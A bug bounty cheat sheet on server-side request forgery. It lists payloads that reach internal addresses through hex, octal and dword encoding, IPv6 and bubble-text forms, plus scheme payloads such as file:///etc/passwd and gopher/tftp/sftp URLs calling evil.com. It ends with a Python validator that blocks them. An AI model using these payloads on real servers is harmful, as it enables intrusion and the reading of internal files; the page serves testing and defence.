AllAboutBugBounty/Server Side Request Forgery.md
2022-07-09 22:37:59 +07:00

Server Side Request Forgery (SSRF)

Introduction

Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests that originate from the vulnerable server.

Where to find

It is usually found in requests that carry a URL for the server to fetch, for example:

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

or

GET /image?url=http://192.168.1.1/ HTTP/1.1
Host: example.com

How to exploit

  1. Basic payload
http://127.0.0.1:1337
http://localhost:1337
  2. Hex encoding
http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
  3. Octal encoding
http://127.0.0.1 -> http://0177.0.0.01
  4. Dword encoding
http://127.0.0.1 -> http://2130706433
  5. Mixed encoding
http://127.0.0.1 -> http://0177.0.0.0x1
  6. Using URL encoding
http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
  7. Using IPv6
http://0000::1:1337/
http://[::]:1337/
  8. Using bubble text
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ

Bubble text can be generated with https://capitalizemytitle.com/bubble-text-generator/

How to exploit (URI Scheme)

  1. File scheme
file:///etc/passwd
  2. Dict scheme
dict://127.0.0.1:1337/
  3. FTP scheme
ftp://127.0.0.1/
  4. TFTP scheme
tftp://evil.com:1337/test
  5. SFTP scheme
sftp://evil.com:1337/test
  6. LDAP scheme
ldap://127.0.0.1:1337/
  7. Gopher scheme
gopher://evil.com/_Test%0ASSRF
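
A defensive check for the payload forms listed in both "How to exploit" sections, as an added example that is not part of the original page. It canonicalises the host before deciding, so every encoding collapses to the address it really names. The names `legacy_ipv4`, `system_resolve` and `check_url` are illustrative, and the http/https-only policy is an assumption.

```python
import ipaddress
import socket
import unicodedata
from urllib.parse import unquote, urlsplit
# Added example: legacy_ipv4, system_resolve and check_url are illustrative names.
def legacy_ipv4(host):
    """Parse hex/octal/dword/mixed IPv4 as inet_aton() does; None if host is a name."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isascii() and p.isalnum() for p in parts):
        return None
    try:
        nums = [int(p[2:], 16) if p[:2] == "0x"
                else int(p, 8 if p[0] == "0" and len(p) > 1 else 10) for p in parts]
    except ValueError:
        return None
    *head, value = nums
    if any(n > 255 for n in head) or value >= 256 ** (4 - len(head)):
        return None
    for i, n in enumerate(head):
        value |= n << (8 * (3 - i))
    return ipaddress.IPv4Address(value)

def system_resolve(host):
    return [info[4][0] for info in socket.getaddrinfo(host, None)]

def check_url(url, resolve=system_resolve):
    """Return (allowed, detail) for a user-supplied URL the server is about to fetch."""
    try:
        parts = urlsplit(url.strip())
        host = parts.hostname
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https") or not host:  # no file, dict, gopher, ...
        return False, "scheme not allowed or host missing"
    # Undo percent-encoding and Unicode compatibility forms (bubble text) before any check.
    host = unicodedata.normalize("NFKC", unquote(host)).lower().rstrip(".")
    ip = legacy_ipv4(host)
    try:
        if ip is None:
            ip = ipaddress.ip_address(host)
        addrs = [ip]
    except ValueError:
        try:  # a name: every address it resolves to must be public
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (OSError, ValueError):
            addrs = []
    if not addrs or not all(a.is_global for a in addrs):
        return False, "internal or unresolvable: " + (", ".join(map(str, addrs)) or host)
    return True, host
```

Validation alone leaves a gap if the HTTP client resolves the name again or follows redirects: connect to the address that was checked and run every redirect target through the same check.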
